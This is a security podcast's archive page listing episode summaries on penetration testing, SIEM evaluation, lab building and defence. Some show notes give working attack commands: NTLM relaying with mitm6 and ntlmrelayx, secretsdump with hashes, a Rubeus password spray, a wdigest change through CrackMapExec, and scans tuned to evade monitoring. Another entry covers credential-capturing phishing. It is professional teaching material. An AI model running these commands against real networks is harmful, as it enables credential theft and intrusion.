Published: Friday, August 11, 2023
In today's tale of pwnage, we'll talk about how domain trusts can be dangerous because they have...well...trust issues.
View this episode's show notes for more information
Published: Friday, August 04, 2023
Today we talk about crafting cool cred-capturing phishing campaigns with Caddy server ! Here's a quick set of install commands for Ubuntu: sudo apt install -y debian-keyring debian-archive-keyring apt-transport-https curl -1sLf...
View this episode's show notes for more information
Published: Monday, July 31, 2023
Today we had a blast playing with Wazuh as a SIEM you can use for work and/or home. Inspiration for this episode came from Network Chuck . This one-liner will literally get Wazuh installed in...
View this episode's show notes for more information
Published: Friday, July 21, 2023
(Sorry, I don't know how to count. The video says it's pwnage part 48, but it's actually part 49)Oooo, giggidy! Today's tale of pentest pwnage is about pwning vCenter with CVE-2021-44228 - a vulnerability that lets us bypass authentication entirely and do/take what we want from vCenter! Key links...
- How to exploit log4j manually in vCenter
- How to automate the attack!
- Tool to steal the SAML database you extract from vCenter
View this episode's show notes for more information
Published: Monday, July 17, 2023
Today me and my pal Paul from Project7 did a live hacking session and finally got the Callahan Auto brake pad Web app back online! Hopefully you enjoyed this hacking series. The feedback has been great, so we may have...
View this episode's show notes for more information
Published: Friday, July 07, 2023
Hey friends, today we're continuing our series on pwning the Tommy Boy VM on VulnHub VM! P.S. did you miss part one? Check it out on YouTube . Joe "The Machine" Skeen and I had a blast poking and...
- It's always a good idea to look at a site's robots.txt file
- crunch is awesome for making wordlists
- fcrackzip is rad for cracking encrypted zip files
- dirbuster works well for busting into hidden files and subfolders
- exiftool works well to pull metadata out of images
View this episode's show notes for more information
Published: Friday, June 30, 2023
Today I'm excited to share a featured interview with our new friend Mike Toole of Blumira . We talk about all things EDR, including:.
- How does it differ from something like Windows Defender?
- What things do I need to keep in mind if I'm in the market for an EDR purchase?
- Is Mac EDR any good?
- How do attackers bypass EDR?
- Will AI create industructible malware, take over the human race and then use our bodies for batteries?
View this episode's show notes for more information
Published: Friday, June 16, 2023
Holy schnikes - this episode is actually 7 minutes long! What a concept!Anyway, today I give you a couple tips that have helped me pwn some internal networks the last few weeks, including:.
- Getting a second (and third?) opinion on Active Directory Certificate Services vulnerabilities!
- Analyzing the root domain object in BloodHound to find some misconfigs that might equal instant domain admin access!
View this episode's show notes for more information
Published: Friday, June 09, 2023
Hey friends! Today we're taking a second look at ADHD - Active Defense Harbinger Distribution - a cool VM full of tools designed to annoy/attribute/attack pesky attackers! The tools covered today include: PHP-HTTP-TARPIT A tool to confuse and waste...
View this episode's show notes for more information
Published: Friday, June 02, 2023
SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount! Hey friends! Today we're looking at...
View this episode's show notes for more information
Published: Friday, May 26, 2023
Today we're talking about reducing anxiety by hacking your mental health with these tips:.
- Using personal automation to text people important reminders
- Using Remind to create a personal communication "class" with your family members
- Using Smartsheet (not a sponsor) to create daily email "blasts" to yourself about all the various project todos you need to tackle
View this episode's show notes for more information
Published: Saturday, May 20, 2023
Today we look at LDAP Firewall - a cool (and free!) way to defend your domain controllers against SharpHound enumeration, [LAPS](https://techcommunity.microsoft.com/t5/windows-it-pro-blog/by-popular-demand-...
View this episode's show notes for more information
Published: Friday, May 12, 2023
Hey friends! This week I spoke at the Secure360 conference in Minnesota on Simple Ways to Test Your SIEM . This is something I covered a while back on the podcast,...
- Questions you can ask a prospective SIEM/SOC solution to figure out which one is the right fit for you
- All the tools/tips/scripts/etc. you need to run through 7 (and more!) simple ways to test your SIEM!
View this episode's show notes for more information
Published: Friday, May 05, 2023
SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!In today's episode we staged an NTLM...
View this episode's show notes for more information
Published: Friday, April 28, 2023
Today we're excited to share a featured interview with our new friend Jim Simpson, CEO of Blumira . Jim was in security before it was hip/cool/lucrative, working with a number of startups as well as some big names like Duo. Blumira and 7 Minute Security have a shared...
View this episode's show notes for more information
Published: Friday, April 21, 2023
Hey friends, today we're playing with the new (April 2023) version of Local Administrator Password Solution (LAPS) . Now it's baked right into PowerShell and the AD Users and...
View this episode's show notes for more information
Published: Friday, April 14, 2023
Hey friends, today we're talking about building an intentionally vulnerable SQL server, and here are the key URLs/commands talked about in the episode:setup.exe /Q /IACCEPTSQLSERVERLICENSETERMS /ACTION="install" /FEATURES=SQL /INSTANCENAME=MSSQLSERVER /TCPENABLED=1 /NPENABLED=1...
- Download SQL Server here
- Install SQL via config .ini file
- Or, install SQL via pure command line
- Deploy SQL with a service account while also starting TCP/IP and named pipes automagically:
- Run PowerUpSQL to find vulnerable SQL servers:
- Audit the discovered SQL servers:
- Fire off stored procedures to catch hashes!
View this episode's show notes for more information
Published: Friday, March 31, 2023
Ok, I know we say this every time, but it is true this time yet again: this is our favorite tale of pentest pwnage. It involves a path to DA we've never tried before, and introduced us to a new trick that one of our favorite old tools can do:rubeus.exe monitor /interval:5 /nowrap /runfor:60...
View this episode's show notes for more information
Published: Friday, March 24, 2023
Hey friends, today we talk through how to simulate ransomware (in a test environment!) using Infection Monkey . It's a cool way to show your team and execs just how quick and deadly an infection can be to your business. You can feed the monkey a list of...
View this episode's show notes for more information
Published: Friday, March 17, 2023
Today we offer you some first impressions of OVHcloud and how we're seriously considering moving our Light Pentest LITE training class to it! TLDR:.
- It runs on vCenter, my first and only virtualization love!
- Unlimited VM "powered on" time and unlimited bandwidth
- Intergration with PowerShell so you can run a single script to "heal" your environment to a gold image
- Easy integration with pfSense to be able to manage the firewall and internal/external IPs
- Price comparable to what we're paying now in Azure land
View this episode's show notes for more information
Published: Friday, March 10, 2023
Hey friends, today we're covering part 2 of our series all about cracking and mapping and execing with CrackMapExec. Specifically we cover: # Enumerate where your user has local admin rights: cme smb x.x.x.x/24 -u user -p password # Set wdigest flag: cme smb x.x.x.x -u user -p password -M wdigest...
View this episode's show notes for more information
Published: Friday, March 03, 2023
SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount! Hey friends, today we covered many...
View this episode's show notes for more information
Published: Friday, February 24, 2023
Today’s episode is brought to us by Blumira, which provides easy to use, automated detection and response that can be setup in…well…about 7 minutes! Detect and resolve security threats faster and prevent breaches. Try it free today at blumira.com/7ms !Today I sat down...
- How do I get started in looking for a cyber policy - with my general liability insurer? Or are there companies that specialize just in cyber insurance?
- How do I make sure I have the appropriate levels of coverage?
- What are basic things I can do from a security standpoint that pretty much any insurer is going to expect me to do?
View this episode's show notes for more information
Published: Friday, February 17, 2023
Hey friends, I took a mental health break this week and pre-podcasted this episode of a new series called 7MOOCH: 7 Minutes of Only Chuckles. In today's story, we unpack a situation in Hawaii that made me exclaim the following quite loudly: "Dolphin rides are done, dude!"
View this episode's show notes for more information
Published: Tuesday, February 07, 2023
Today we continue part 2 of a series we started a few weeks ago all about building a vulnerable pentesting lab. Check out the video above, and here are the main snippets of code and tips to get you going:sudo python ./youzer.py...
- Use Youzer to import a bunch of bogus users into your Active Directory:
- Make a Kerberoastable user:
View this episode's show notes for more information
Published: Friday, January 27, 2023
Today we're talking about Teleseer , which is an awesome service to give you better network visibility - whether you're on the blue, red or purple team! It all starts with a simple packet capture, and ends with gorgeous visuals and insight into what the heck is on your...
View this episode's show notes for more information
Published: Friday, January 20, 2023
Today's episode is brought to us by our friends at Blumira ! Today we kick off a series all about building your own vulnerable pentest lab from scratch, specifically: Here are the code snippets that help you get an Active Directory environment going on the quick: # Get...
- Spinning up a domain controller with a few lines of PowerShell
- Installing Active Directory Domain Services
- Setting up an intentionally cruddy password policy
- Baking in the MS14-025 vulnerability
View this episode's show notes for more information
Published: Friday, January 13, 2023
Today we're releasing version 1.1 of our Light Pentest eBook . Changes discussed in today's episode (and shown live in the accompanying YouTube video ) include:.
- Some typos and bug fixes
- A new section on finding systems with unconstrained delegation and exploiting them
- A new section on finding easily pwnable passwords via password spraying
- A new section relaying credentials with MITM6 (be careful using some of its options - read this )
- New ways (and some words of warning ) to dump hashes from Active Directory
View this episode's show notes for more information
Published: Friday, January 06, 2023
Today we talk about Simple Ways to Test Your SIEM. Feel free to check out the YouTube version of this presentation, as well as our interview with Matt from Blumira for even more...
View this episode's show notes for more information
Published: Friday, December 30, 2022
Hey friends, today's episode is hosted by an AI from Murf.ai because I suffered a throat injury over the holidays and spent Christmas morning in the emergency room! TLDL: I'm fine, but if you want the (sort of) gory details and an update on my condition after my ENT...
View this episode's show notes for more information
Published: Saturday, December 24, 2022
SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!Today's tale of pentest pwnage covers...
- Teleseer for packet capture visualizations on steroids!
- Copernic Desktop Search
- Running Responder as Responder.py -I eth0 -A will analyze traffic but not poison it
- I like to run mitm6 in one window with mitm6.py -i eth0 -d mydomain.com --no-ra --ignore-nofqdn and then in another window I do ntlmrelayx.py -6 -wh doesntexist -t ldaps://ip.of.the.dc -smb2support --delegate-access > relaysRphun.log - that way I always have a log of everything happening during the mitm6 attack
- Vast.ai looks to be a cost-effective way to crack hashes in the cloud (haven't tested it myself yet)
View this episode's show notes for more information
Published: Friday, December 16, 2022
Today we welcome our pal Matthew Warner (CTO and co-founder of Blumira ) back to the show for a third time (his first appearance was #507 and second was [#529](https://7ms.us/7ms-529-interview-with-matthew-...
- ASAAdmins
- Account Operators
- Administrators
- Administrators
- Backup Operators
- Cert Publishers
- Certificate Service DCOM
- DHCP Administrators
- Debugger Users
- DnsAdmins
- Domain Admins
- Enterprise Admins
- Enterprise Admins
- Event Log Readers
- ExchangeAdmins
- Group Policy Creator Owners
- Hyper-V Administrators
- IIS_IUSRS
- IT Compliance and Security Admins
- Incoming Forest Trust Builders
- MacAdmins
- Network Configuration Operators
- Schema Admins
- Server Operators
- ServerAdmins
- SourceFireAdmins
- WinRMRemoteWMIUsers
- WorkstationAdmins
- vCenterAdmins
View this episode's show notes for more information
Published: Friday, December 09, 2022
This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more.Hey friends, today's...
- Things we keep getting caught doing (and some potential ways to not get caught! Responder SharpHound CrackMapExec - specifically running -x or -X to enumerate systems PowerHuntShares
- Responder
- SharpHound
- CrackMapExec - specifically running -x or -X to enumerate systems
- PowerHuntShares
- "FUD sprinklers" - people who cast fear, uncertainty and doubt on your pentest findings
- A story about the time I took down a domain controller (yikes)
View this episode's show notes for more information
Published: Friday, December 02, 2022
This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more.Today my friends...
View this episode's show notes for more information
Published: Friday, November 25, 2022
SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!Happy belated Thanksgiving!This is not a...
View this episode's show notes for more information
Published: Friday, November 18, 2022
This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more.Today we're talking...
View this episode's show notes for more information
Published: Friday, November 11, 2022
This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more.Today we're talking...
View this episode's show notes for more information
Published: Friday, November 04, 2022
Today’s episode of the 7 Minute Security podcast is brought to you by Blumira, which provides easy-to-use automated detection and response that can be set up in…well..about 7 minutes. Detect and resolve security threats faster, and prevent breaches. Try it free today at blumira.com/7ms.Hey...
View this episode's show notes for more information
Published: Friday, October 28, 2022
Today’s episode is brought to us by Blumira, which provides easy to use, automated detection and response that can be setup in…well…about 7 minutes! Detect and resolve security threats faster and prevent breaches. Try it free today at blumira.com/7ms !Today we have a...
View this episode's show notes for more information
Published: Friday, October 21, 2022
This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more.Hey friends! Today we...
View this episode's show notes for more information
Published: Friday, October 14, 2022
This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more.In today's episode we...
View this episode's show notes for more information
Published: Friday, October 07, 2022
SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!Today we talk about configuring your...
View this episode's show notes for more information
Published: Friday, September 30, 2022
Today we're excited to kick off a new series all about blue team bliss - in other words, we're talking about pentest stories where the blue team controls kicked our butt a little bit! Topics include:In the tangent department:.
- The ms-ds-machineaccount-quota value is not an "all or nothing" option! Check out Computer Configuration > Policies > Windows Settings > Security Settings > Local Policies > User Rights Assignment > Add workstations to domain.
- We installed LAPS on Twitch last week and it went pretty well! We'll do it again in an upcoming livestream .
- Defensive security tools that can interrupt the SharpHound collection!
- EDRs are pretty awesome at catching bad stuff - and going into full "shields up" mode when they're irritated!
- This is me if I was a rapper .
- This car made me giggle:
View this episode's show notes for more information
Published: Friday, September 23, 2022
This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more.Today we revisit a...
- How the internal 7MS infosec policy development is coming along
- Why I’m no longer going to be “product agnostic” going forward
- Some first impressions of a new tool I’m trying called ITGlue (not a sponsor)
- How to start building a critical asset list - and how it shouldn’t overlook things like domain names and LetsEncrypt certs
View this episode's show notes for more information
Published: Friday, September 16, 2022
SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!Hey friends! Today we're giving you a...
View this episode's show notes for more information
Published: Friday, September 09, 2022
Today’s episode is brought to us by Blumira, which provides easy to use, automated detection and response that can be setup in…well…about 7 minutes! Detect and resolve security threats faster and prevent breaches. Try it free today at blumira.com/7ms !In today's episode...
- If you find yourself with "owns" rights to a bajillion hosts in BloodHound, this query will give you a nice list of those systems, one system per line:
- For resource based constrained delegation attacks, check out this episode of pwnage for some step-by-step instructions.
- If you have RBCD admin access to victim systems, don't forget that CrackMapExec support Kerberos! So you can do stuff like:
- Take the time to search SMB shares with something like PowerHuntShares . If you have write access in places, drop an SCF file to capture/pass hashes!
- Looking to privilege escalate while RDP'd into a system? You owe it to yourself to check out KrbRelayUp !
- Ever find yourself with cracked hashcat passwords that look something like '$HEX[xxxx]'? Check this tweet from mpgn for a great cracking tip!
View this episode's show notes for more information
Published: Friday, September 02, 2022
Today we're so excited to welcome Amanda Berlin , Lead Incident Detection Engineer at Blumira , back to the show (did you miss Amanda's first appearance on the show? Check it out [here](https://7ms.us/7ms-518-interview-with-amanda-berlin-...
- What if HAFNIUM2 comes out today and only affects 2 specific versions of Exchange? Does Blumira buy every software/hardware thingy out there and have an evil scientist lab where they test out all these different exploits, and then create detections for them?
- Can an old, out-of-touch security guy like me still find a place at the Vegas hacker conferences (even though I hate lines, heat, crowds and partying)? Spoiler alert: yes.
- Are security vendors more likely to share their software/hardware security services with a defensive security group like Blumira, rather than pentesters like 7MinSec?
- Does Amanda think there's a gender bias in the security industry?
- Besides being aware of it happening, what can we do to cut down the bullying/secure-splaining/d-baggery/etc. in the industry?
View this episode's show notes for more information
Published: Sunday, August 28, 2022
This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more.Today's episode...
View this episode's show notes for more information
Published: Friday, August 19, 2022
This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more. Hey friends, today...
- If you find you have local admin on a bunch of privileges and want to quickly loop through a secretsdump of ALL systems and save the output to a text file, this little hacky script will do it!
- Got an NTLM hash for a privileged user and want to PS remote into a victim system? You can essentially do a PowerShell login pass-the-hash with evil-winrm !
- The Brute Ratel crisis monitor is awesome for watching a box and monitoring for people logging in and out of it (perfect for getting ready to strike with lsass dumps!)
View this episode's show notes for more information
Published: Friday, August 12, 2022
This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more.Ok, ok, I know. I...
- PowerHuntShares is awesome at finding SMB shares and where you have read/write permissions on them. Note there is a -Threads flag to adjust the intensity of your scan.
- Are your mitm6 attacks not working properly - even though they look like they should? There might be seem LDAP/LDAPs protections in play. Use LdapRelayScan to verify!
- Are you trying to abuse Active Directory Certificate Services attack ESC1 but things just don't seem to be working? Make sure the cert you are forging is properly representing the user you are trying to spoof by using Get-LdapCurrentUser.ps1 . Also look at PassTheCert as another tool to abuse ADCS vulnerabilities.
- If you manage to get your hands on an old Active Directory backup, this PowerShell snippet will help you get a list of users from the current domain, sorted by passwordlastset. That way you can quickly find users who haven't changed their password since the AD backup:
View this episode's show notes for more information
Published: Saturday, August 06, 2022
SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount! Hey friends, wow...we're up to thirty-...
View this episode's show notes for more information
Published: Monday, August 01, 2022
This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more.Today we're joined by...
- Knowing what you have (assets, installed software, etc.) - Rumble is a cheap/free way to find out!
- Creating core policies and procedures that you will actually follow
- Learning about security frameworks that will help you build a security program from scratch
- Preparing for your first (or next) pentest. Tools like PingCastle and BloodHound can help find hacker low-hanging fruit!
- Knowing where your crown jewels are - be that data, a database, a key system, etc.
- Writing critical documentation - especially backup/restore procedures.
- Forming a security "dream team" to help drive your program
- Asking the right security maturity questions at your next job interview (so you don't get hired into a dumpster fire!)
View this episode's show notes for more information
Published: Friday, July 22, 2022
This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more.Hey friends, we have...
- Get-InternalSubnets.ps1 - for getting internal subnets
- Adalanche for grabbing Active Directory info (similar to SharpHound)
- Copernic Desktop Search for pillaging through shares with Google-like search capabilities!
- PowerHuntShares is my new favorite tool for enumerating network shares and associated permissions!
- CeWL for creating awesome wordlists to crack with!
View this episode's show notes for more information
Published: Friday, July 15, 2022
Today we're featuring a great interview with Matthew Warner, CTO and co-founder of Blumira . You might remember Matt from such podcasts as this one ) when Matt gave us a fountain of info on why out-of-the-...
- How do companies like Blumira (who we rely on to stay on top of threats) keep their teams on top of threats?
- Why open source detections are a great starting point - but not a magic bullet
- Consider this "what if" - a C2 beacon lands on your prod file server in the middle of the work day. Do you take it down during a busy time to save/clean the box as much as possible? Or do you hope to be able to wait until the weekend and triage it on a weekend?
- Why annoying traffic/alerts are still worth having a conversation about. For example, if you RDP out of your environment and into Azure, that might be fine. But what about when you see an RDP connection going out to a Digital Ocean droplet? Should you care? Well, do you use Digital Ocean for legit biz purposes?
- Data exfiltration - where does it sit on your priority list? How hard is it to monitor/block?
- Common lateral movement tools/techniques
- Why honeypots rule!
View this episode's show notes for more information
Published: Friday, July 08, 2022
Today's episode is sponsored by Blumira !In today's episode, I try to get us thinking about our extended family's emergency/DR plan. Why? Because I recently had a close family member suffer a health scare, and it brought to light some questions we didn't have all the...
- Do we have creds to log onto his computer?
- How about his email accounts?
- Do we have usernames/passwords for retirement accounts, bank accounts, etc.?
- For vehicles/ATVs/boats/etc. - do we have documentation about their service records? How about titles?
- Can we get into his phone to get key info off of text messages and grab phone #s of key contacts?
- What are his wishes if he were to pass? Do not resuscitate? How is the money getting handled? Cremation vs. burial?
- Do we have redundancy in this plan, or is it all on paper in a file somewhere?
View this episode's show notes for more information
Published: Friday, July 01, 2022
SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!In today's episode we talk about [Purple...
View this episode's show notes for more information
Published: Friday, June 24, 2022
This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more.Today's another fun...
- Under Computer Configuration > Policies > Windows Settings > Security Settings > Local Policies > Security Options set Interactive logon: Number of previous logons to cache to 0. Be careful, as you will have login problems if a domain controller is not immediately accessible!
View this episode's show notes for more information
Published: Friday, June 17, 2022
Today we're sharing an updates to episode #512 where we ran Rapid7's InsightIDR through a bunch of attacks:In today's episode I share some emails and conversations we had with Rapid7 about...
- Active Directory enumeration via SharpHound
- Password spraying through Rubeus
- Kerberoasting and ASREPRoasting via Rubeus
- Network protocol poisoning with Inveigh . Looking for a free way to detect protocol poisoning? Check out CanaryPi .
- Hash dumping using Impacket . I also talk about an interesting Twitter thread that discusses the detection of hash dumping.
- Pass-the-hash attacks with CrackMapExec
- Getting Started with Rapid7 InsightIDR: A SIEM Tutorial
- Testing & Evaluating SIEM Systems: A Review of Rapid7 InsightIDR
View this episode's show notes for more information
Published: Friday, June 10, 2022
This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more.I'm extra psyched...
View this episode's show notes for more information
Published: Friday, June 03, 2022
SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!Well friends, it has been a while since...
- Password settings: select Enabled and then tweak settings to your liking. Personally, I like my password policies how I like my mint hot cocoas. Strong.
- Name of administrator account to manage: careful here! If you're just going to use built in Administrator account, do not enable this setting. Otherwise do enable it and type in the account you want to manage (like localadmin or helpdesk or whatever you call your account that's deployed across your servers and workstations)
- Do not allow password expiration time longer than required by policy: set to Enabled.
- Enable local admin password management: set to Enabled.
- For the x86 package, add it as Assigned. Once the package appears, right click it and click Properties. Then under Deployment > Advanced, untick the box that says Make this 32-bit x86 application available to Win64 machines.
- For the x64 package, add it as Assigned.
View this episode's show notes for more information
Published: Friday, May 27, 2022
[fusion_builder_container type="flex" hundred_percent="no" equal_height_columns="no" hide_on_mobile="small-visibility,medium-visibility,large-visibility" background_position="center center" background_repeat="no-repeat" fade="no" background_parallax="none" parallax_speed="0.3"...
View this episode's show notes for more information
Published: Friday, May 20, 2022
This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more. Hey friends! Today's...
View this episode's show notes for more information
Published: Friday, May 13, 2022
This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more.Hey friends, today...
- Setting the right communication cadence - and communication channels - with a customer during a pentest.
- Tips for collaborating well with contractors so that the customer experience feels like "a single human pane of glass" (insert barf emoji here).
- How we're using Intercom to publish self-help/FAQ articles for 7MS.
View this episode's show notes for more information
Published: Saturday, May 07, 2022
Hey friends, it's another fun tale of pentest pwnage today! This one talks about cool things you can do when you have full rights over an OU in Active Directory. Important links to review:.
View this episode's show notes for more information
Published: Thursday, April 28, 2022
Today we're pumped to share a featured interview with Amanda Berlin , Lead Incident Detection Engineer at Blumira . You might already be familiar with Amanda's awesome [Defensive Security Handbook](https://www.amazon.com/Defensive-Security-...
- Can you tell us more about your infosec superhero origin story and creation of your book?
- Will there ever be a new version of the Defensive Security Handbook?
- What blue team certs/YouTube vids/classes/conferences give the best bang for your buck?
- Was it a mistake to invent computers?
- From a logging standpoint, what devices provide blind spots (Linux systems, ioT devices, etc.)?
- You can wave a magic wand and solve any three security challenges instantly - what do you choose?
- Infosec Twitter drama. Love it? Leave it? Something inbetween?
- Tips to prevent business email compromise?
- How do we keep beloved family/friends (who keep falling prey to social engineering campaigns) safer on their computers and on the Web?
- Our company had a partial ransomware deployment a few years ago. Is changing Active Directory passwords changed and formatting affected systems enough? (Spoiler alert: no. See Microsoft's advice on the topic)
View this episode's show notes for more information
Published: Friday, April 22, 2022
This podcast is sponsored by Arctic Wolf, whose Concierge Security teams Monitor, Detect and Respond to Cyber threats 24/7 for thousands of customers around the world. Arctic Wolf. Redefining cybersecurity. Visit Arcticwolf.com/7MS to learn more.Today we're...
View this episode's show notes for more information
Published: Thursday, April 14, 2022
SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!In today's episode I talk about a cool...
View this episode's show notes for more information
Published: Wednesday, April 06, 2022
Today we continue the series we started a few years ago called Security Your Family During and After a Disaster (the last part in this series was from a few years ago . In today's episode we focus on some...
View this episode's show notes for more information
Published: Wednesday, March 30, 2022
SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!Welcome to another fun tale of pentest...
- I'm seeing nmap scans get flagged a bit more from managed SOC services. Maybe a "quieter" nmap scan will help get enough ports to do a WitnessMe run, but still fly under the logging/alerting radar? Something like: nmap -p80,443,8000,8080 subnet.i.wanna.scan/24 -oA outputfile
- Using mitm6 in "sniper" mode by targeting just one host with: mitm6 -hw victim-I-want-to-get-juicy-info-from -d victim.domain --ignore-nofqdn
- Using secretsdump to target a single host: secretsdump.py -target-ip 1.2.3.4 localadmin:@1.2.3.4 -hashes THIS-IS-WHERE-THE:SAM-HASHES-GO. Note the colon after localadmin - it's intentional, NOT an error!
- Rubeus makes password spraying easy-peasy! Rubeus.exe spray /password:Winter2022 /outfile:output.txt. Get some hits from that effort? Then spray the good password against ALL domain accounts and you might get even more gold!
- LDAPs relaying not working? Make sure it's config'd right: nmap -p636 -sV -iL txt-file-with-dcs-in-it
View this episode's show notes for more information
Published: Thursday, March 24, 2022
Today we're joined by our friends Christopher Fielder and Jon Crotty from Arctic Wolf to talk about their interesting report on The State of Cybersecurity: 2022 Trends (note: you can get some of the...
- Many orgs are running the bare minimum (or nothing!) for endpoint protection
- Cyber insurance costs are going up, and some customers are unable to afford it - or they're getting dropped by their carrier altogether
- Security is still not getting a seat at the decision-making table in a lot of orgs, and already-overburned IT teams taking on security as part of their job descriptions as well
- Seems like everybody and their mom is moving infrastructure to the cloud, but few are managing that attack surface, thus increasing risk
- The cyber skills gap remains a challenge - many security gurus are looking to get out of their current position, leading many orgs to hire inexperienced teams who make rushed/misinformed decisions about security tools and services, thus making the org less secure
View this episode's show notes for more information
Published: Thursday, March 17, 2022
This episode of 7 Minute Security is sponsored by Datadog. Now offering Cloud Security Posture Management (CPSM), Datadog provides one-click compliance posture. Built on the unified Datadog Agent and platform-wide cloud integrations, you can easily get set up minutes. Try it for yourself today...
View this episode's show notes for more information
Published: Friday, March 11, 2022
Today we're continuing our series focused on [owning a security consultancy], talking specifically about:.
- How not to give up on warm sales leads, even if they haven't panned out for 5+ years!
- Some cool Mac tools that help me manage 7MS - such as Craft and OmniFocus
- A sneak peek at a SIEM vendor that will soon be featured in an episode of Desperately Seeking a Super SIEM for SMBs
View this episode's show notes for more information
Published: Wednesday, March 02, 2022
Today we share some first impressions of Tailscale , a service that advertises itself as "Zero config VPN. Installs on any device in minutes, manages firewall rules for you, and works from anywhere." Is it really that cool and easy? Listen to today's episode to find out!
View this episode's show notes for more information
Published: Wednesday, February 23, 2022
Today we revisit our phishing series with a few important updates that help us run our campaigns more smoothly, such as creating a simple but effective fake O365 portal, and being aware that some email systems may "pre-click" malicious links...
View this episode's show notes for more information
Published: Friday, February 18, 2022
Hey friends! We have another fun test of pentest pwnage to share with you today, which is kind of tossed in a blender with some first impressions of ShellcodePack . We were on a bunch of pentests recently where we needed to dump credentials out of memory. We...
View this episode's show notes for more information
Published: Wednesday, February 09, 2022
Today's featured interview is with Matthew Warner, CTO and co-founder of Blumira . We had a great chat about why out-of-the-box Windows logging isn't super awesome, "free" ways to get logging turned up to 11 ( [Microsoft's audit policy...
View this episode's show notes for more information
Published: Thursday, February 03, 2022
Today's my favorite tale of pentest pwnage (again)! This time we're talking about sAMAccountName spoofing specifically. We also talk about my always-under-construction list of things I try early in a pentest for...
- Run PingCastle
- Do the SharpHound/BloodHound dumps
- Run the DHCP poisoning module of Responder
- Check the ms-DS-MachineAccountQuota value in the domain - if its at the default (10), then any user can add machines to the domain.
View this episode's show notes for more information
Published: Friday, January 28, 2022
Hey friends, today I talk about the old school way I used to pwn wifi networks, then a more modern way, and then my new favorite way (spoiler alert: I use Bettercap ). For some background, I found that the [Alfa Long-Range Dual-Band AC1200 Wireless USB...
View this episode's show notes for more information
Published: Thursday, January 20, 2022
